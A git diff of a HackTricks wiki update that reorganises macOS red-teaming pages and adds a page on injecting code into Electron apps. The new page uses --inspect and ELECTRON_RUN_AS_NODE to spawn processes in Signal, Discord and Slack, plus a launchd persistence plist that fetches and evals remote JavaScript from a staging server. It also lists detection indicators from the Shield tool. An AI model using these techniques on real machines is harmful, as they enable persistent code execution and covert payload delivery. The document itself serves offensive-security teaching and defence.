GITBOOK-3977: change request with no subject merged in GitBook

SUMMARY.md

@@ -144,9 +144,6 @@
   * [macOS AppleFS](macos-hardening/macos-security-and-privilege-escalation/macos-applefs.md)
   * [macOS Kernel](macos-hardening/macos-security-and-privilege-escalation/mac-os-architecture/README.md)
     * [macOS Kernel Extensions](macos-hardening/macos-security-and-privilege-escalation/mac-os-architecture/macos-kernel-extensions.md)
-  * [macOS MDM](macos-hardening/macos-security-and-privilege-escalation/macos-mdm/README.md)
-    * [Enrolling Devices in Other Organisations](macos-hardening/macos-security-and-privilege-escalation/macos-mdm/enrolling-devices-in-other-organisations.md)
-    * [macOS Serial Number](macos-hardening/macos-security-and-privilege-escalation/macos-mdm/macos-serial-number.md)
   * [macOS Network Services & Protocols](macos-hardening/macos-security-and-privilege-escalation/macos-protocols.md)
   * [macOS Bypassing Firewalls](macos-hardening/macos-security-and-privilege-escalation/macos-bypassing-firewalls.md)
   * [macOS File Extension & URL scheme app handlers](macos-hardening/macos-security-and-privilege-escalation/macos-file-extension-apps.md)
@@ -162,6 +159,7 @@
       * [macOS XPC Connecting Process Check](macos-hardening/macos-security-and-privilege-escalation/mac-os-architecture/macos-ipc-inter-process-communication/macos-xpc-connecting-process-check.md)
       * [macOS PID Reuse](macos-hardening/macos-security-and-privilege-escalation/mac-os-architecture/macos-ipc-inter-process-communication/macos-pid-reuse.md)
       * [macOS XPC Authorization](macos-hardening/macos-security-and-privilege-escalation/mac-os-architecture/macos-ipc-inter-process-communication/macos-xpc-authorization.md)
+    * [macOS Electron Applications Injection](macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-electron-applications-injection.md)
     * [macOS Function Hooking](macos-hardening/macos-security-and-privilege-escalation/mac-os-architecture/macos-function-hooking.md)
     * [macOS Library Injection](macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-library-injection/README.md)
       * [macOS Dyld Hijacking & DYLD\_INSERT\_LIBRARIES](macos-hardening/macos-security-and-privilege-escalation/macos-dyld-hijacking-and-dyld\_insert\_libraries.md)
@@ -173,7 +171,10 @@
     * [macOS TCC](macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-tcc/README.md)
       * [macOS Apple Scripts](macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-tcc/macos-apple-scripts.md)
   * [macOS Users](macos-hardening/macos-security-and-privilege-escalation/macos-users.md)
-* [macOS Red Teaming](macos-hardening/macos-security-and-privilege-escalation/macos-red-teaming.md)
+* [macOS Red Teaming](macos-hardening/macos-red-teaming/README.md)
+  * [macOS MDM](macos-hardening/macos-red-teaming/macos-mdm/README.md)
+    * [Enrolling Devices in Other Organisations](macos-hardening/macos-red-teaming/macos-mdm/enrolling-devices-in-other-organisations.md)
+    * [macOS Serial Number](macos-hardening/macos-red-teaming/macos-mdm/macos-serial-number.md)
 * [macOS Useful Commands](macos-hardening/macos-useful-commands.md)
 * [macOS Auto Start Locations](macos-hardening/macos-auto-start-locations.md)
 

macos-hardening/macos-red-teaming/README.md

@@ -27,8 +27,8 @@ For red teaming in MacOS environments it's highly recommended to have some under
 
 And also about **MacOS** "special" **network** **protocols**:
 
-{% content-ref url="macos-protocols.md" %}
-[macos-protocols.md](macos-protocols.md)
+{% content-ref url="../macos-security-and-privilege-escalation/macos-protocols.md" %}
+[macos-protocols.md](../macos-security-and-privilege-escalation/macos-protocols.md)
 {% endcontent-ref %}
 
 ## Active Directory

macos-hardening/macos-security-and-privilege-escalation/README.md

@@ -60,8 +60,8 @@ If you are not familiar with macOS, you should start learning the basics of macO
 
 In companies **macOS** systems are highly probably going to be **managed with a MDM**. Therefore, from the perspective of an attacker is interesting to know **how that works**:
 
-{% content-ref url="macos-mdm/" %}
-[macos-mdm](macos-mdm/)
+{% content-ref url="../macos-red-teaming/macos-mdm/" %}
+[macos-mdm](../macos-red-teaming/macos-mdm/)
 {% endcontent-ref %}
 
 ### MacOS - Inspecting, Debugging and Fuzzing

macos-hardening/macos-security-and-privilege-escalation/macos-apps-inspecting-debugging-and-fuzzing/README.md

@@ -379,6 +379,16 @@ cat procs.txt
 
 Or use `netstat` or `lsof`
 
+### Libgmalloc
+
+<figure><img src="../../../.gitbook/assets/Pasted Graphic 14.png" alt=""><figcaption></figcaption></figure>
+
+{% code overflow="wrap" %}
+```bash
+lldb -o "target create `which some-binary`" -o "settings set target.env-vars DYLD_INSERT_LIBRARIES=/usr/lib/libgmalloc.dylib" -o "run arg1 arg2" -o "bt" -o "reg read" -o "dis -s \$pc-32 -c 24 -m -F intel" -o "quit"
+```
+{% endcode %}
+
 ### Fuzzers
 
 #### [AFL++](https://github.com/AFLplusplus/AFLplusplus)

macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/README.md

@@ -40,6 +40,30 @@ Inter Process Communication (IPC) refers to different methods by which separate
 [macos-ipc-inter-process-communication](../mac-os-architecture/macos-ipc-inter-process-communication/)
 {% endcontent-ref %}
 
+### Electron Applications Injection
+
+Electron applications executed with specific env variables could be vulnerable to process injection:
+
+{% content-ref url="macos-electron-applications-injection.md" %}
+[macos-electron-applications-injection.md](macos-electron-applications-injection.md)
+{% endcontent-ref %}
+
+## Detection
+
+### Shield
+
+[**Shield**](https://theevilbit.github.io/shield/) ([**Github**](https://github.com/theevilbit/Shield)) is an open source application that can **detect and block process injection** actions:
+
+* Using **Environmental Variables**: It will monitor the presence of any of the following environmental variables: **`DYLD_INSERT_LIBRARIES`**, **`CFNETWORK_LIBRARY_PATH`**, **`RAWCAMERA_BUNDLE_PATH`** and **`ELECTRON_RUN_AS_NODE`**
+* Using **`task_for_pid`** calls: To find when one process wants to get the **task port of another** which allows to inject code in the process.
+* **Electron apps params**: Someone can use **`--inspect`**, **`--inspect-brk`** and **`--remote-debugging-port`** command line argument to start an Electron app in debugging mode, and thus inject code to it.
+* Using **symlinks** or **hardlinks**: Typically the most common abuse is to **place a link with our user privileges**, and **point it to a higher privilege** location. The detection is very simple for both hardlink and symlinks. If the process creating the link has a **different privilege level** than the target file, we create an **alert**. Unfortunately in the case of symlinks blocking is not possible, as we don’t have information about the destination of the link prior creation. This is a limitation of Apple’s EndpointSecuriy framework.
+
+## References
+
+* [https://theevilbit.github.io/shield/](https://theevilbit.github.io/shield/)
+* [https://medium.com/@metnew/why-electron-apps-cant-store-your-secrets-confidentially-inspect-option-a49950d6d51f](https://medium.com/@metnew/why-electron-apps-cant-store-your-secrets-confidentially-inspect-option-a49950d6d51f)
+
 <details>
 
 <summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>

macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-electron-applications-injection.md

@@ -0,0 +1,97 @@
+# macOS Electron Applications Injection
+
+<details>
+
+<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
+
+* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
+* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
+* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
+* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
+* **Share your hacking tricks by submitting PRs to the** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **and** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud).
+
+</details>
+
+## Inspect Electron Application
+
+According to [**this**](https://medium.com/@metnew/why-electron-apps-cant-store-your-secrets-confidentially-inspect-option-a49950d6d51f), if you execute an Electron application with flags such as **`--inspect`**, **`--inspect-brk`** and **`--remote-debugging-port`**, a **debug port will be open** so you can connect to it (for example from Chrome in `chrome://inspect`) and you will be able to **inject code on it** or even launch new processes.\
+For example:
+
+{% code overflow="wrap" %}
+```bash
+/Applications/Signal.app/Contents/MacOS/Signal --inspect=9229
+# Connect to it using chrome://inspect and execute a calculator with:
+require('child_process').execSync('/System/Applications/Calculator.app/Contents/MacOS/Calculator')
+```
+{% endcode %}
+
+{% hint style="danger" %}
+Note that now most Electron applications will ignore node parameters (such as --inspect) when launched unless the env variable **`ELECTRON_RUN_AS_NODE`** is set.
+
+However, you could still use the electron param `--remote-debugging-port=9229` but the previous payload won't work to execute other processes.
+{% endhint %}
+
+## `ELECTRON_RUN_AS_NODE` <a href="#electron_run_as_node" id="electron_run_as_node"></a>
+
+According to [**the docs**](https://www.electronjs.org/docs/latest/api/environment-variables#electron\_run\_as\_node), if this env variable is set, it will start the process as a normal Node.js process.
+
+{% code overflow="wrap" %}
+```bash
+# Run this
+ELECTRON_RUN_AS_NODE=1 /Applications/Discord.app/Contents/MacOS/Discord
+# Then from the nodeJS console execute:
+require('child_process').execSync('/System/Applications/Calculator.app/Contents/MacOS/Calculator')
+```
+{% endcode %}
+
+As [**proposed here**](https://www.trustedsec.com/blog/macos-injection-via-third-party-frameworks/), you could abuse this env variable in a plist to maintain persistence:
+
+```xml
+<?xml version="1.0" encoding="UTF-8"?>
+<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
+<plist version="1.0">
+<dict>
+    <key>EnvironmentVariables</key>
+    <dict>
+           <key>ELECTRON_RUN_AS_NODE</key>
+           <string>true</string>
+    </dict>
+    <key>Label</key>
+    <string>com.xpnsec.hideme</string>
+    <key>ProgramArguments</key>
+    <array>
+        <string>/Applications/Slack.app/Contents/MacOS/Slack</string>
+        <string>-e</string>
+        <string>const { spawn } = require("child_process"); spawn("osascript", ["-l","JavaScript","-e","eval(ObjC.unwrap($.NSString.alloc.initWithDataEncoding( $.NSData.dataWithContentsOfURL( $.NSURL.URLWithString('http://stagingserver/apfell.js')), $.NSUTF8StringEncoding)));"]);</string>
+    </array>
+    <key>RunAtLoad</key>
+    <true/>
+</dict>
+</plist>
+```
+
+### `ELECTRON_RUN_AS_NODE` & `NODE_OPTIONS` &#x20;
+
+With this combination you could store the payload in a different file and execute that file:
+
+{% code overflow="wrap" %}
+```bash
+# Content of /tmp/payload.js
+require('child_process').execSync('/System/Applications/Calculator.app/Contents/MacOS/Ca$
+
+# Execute
+NODE_OPTIONS="--require /tmp/payload.js" ELECTRON_RUN_AS_NODE=1 /Applications/Discord.app/Contents/MacOS/Discord
+```
+{% endcode %}
+
+<details>
+
+<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
+
+* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
+* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
+* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
+* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
+* **Share your hacking tricks by submitting PRs to the** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **and** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud).
+
+</details>

macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/README.md

@@ -163,7 +163,7 @@ system_profiler SPInstallHistoryDataType 2>/dev/null | grep -A 4 "XProtectPlistC
 
 The Malware Removal Tool (MRT) is another part of macOS's security infrastructure. As the name suggests, MRT's main function is to **remove known malware from infected systems**.
 
-Once malware is detected on a Mac (either by XProtect or by some other means), MRT can be used to automatically **remove the malware**. MRT operates silently in the background and typically runs whenever the system is updated or when a new malware definition is downloaded.
+Once malware is detected on a Mac (either by XProtect or by some other means), MRT can be used to automatically **remove the malware**. MRT operates silently in the background and typically runs whenever the system is updated or when a new malware definition is downloaded (it looks like the rules MRT has to detect malware are inside the binary).
 
 While both XProtect and MRT are part of macOS's security measures, they perform different functions:
 
@@ -174,7 +174,9 @@ While both XProtect and MRT are part of macOS's security measures, they perform
 
 ### SIP - System Integrity Protection
 
-
+{% content-ref url="macos-sip.md" %}
+[macos-sip.md](macos-sip.md)
+{% endcontent-ref %}
 
 ### Sandbox